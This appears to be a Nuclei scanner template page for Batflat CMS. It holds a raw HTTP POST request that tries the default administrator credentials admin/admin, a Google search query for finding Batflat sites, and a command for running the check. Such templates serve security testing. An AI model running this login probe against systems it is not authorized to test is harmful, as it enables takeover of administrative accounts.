Batflat CMS - Default Login

ID: batflat-default-login

Severity: high

Author: r3Y3r53

Tags: default-login,batflat

Description

Batflat CMS is vulnerable to default login vulnerability that most commonly affects devices having some pre-set (default) administrative credentials to access all configuration settings.

YAML Source

id: batflat-default-login

info:
  name: Batflat CMS - Default Login
  author: r3Y3r53
  severity: high
  description: |
    Batflat CMS is vulnerable to default login vulnerability that most commonly affects devices having some pre-set (default) administrative credentials to access all configuration settings.
  reference:
    - https://www.exploitalert.com/view-details.html?id=34749
    - https://cxsecurity.com/issue/WLB-2020010100
  classification:
    cpe: cpe:2.3:a:batflat:batflat:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: batflat
    product: batflat
    google-query: intext:"Powered by Batflat."
  tags: default-login,batflat

http:
  - raw:
      - |
        POST /admin/ HTTP/2
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&login=

    attack: pitchfork
    payloads:
      username:
        - "admin"
      password:
        - "admin"
    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains(body, "Batflat - Dashboard")'
        condition: and
# digest: 490a00463044022019b8abce46ed368477624678306129dd84fb558b02226d93301aa4786d283e7902203ddb728f824dc516594c97c7df71ad4ca740a059fd6e94d9a8f4232e62400a17:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/default-logins/batflat/batflat-default-login.yaml"

View on Github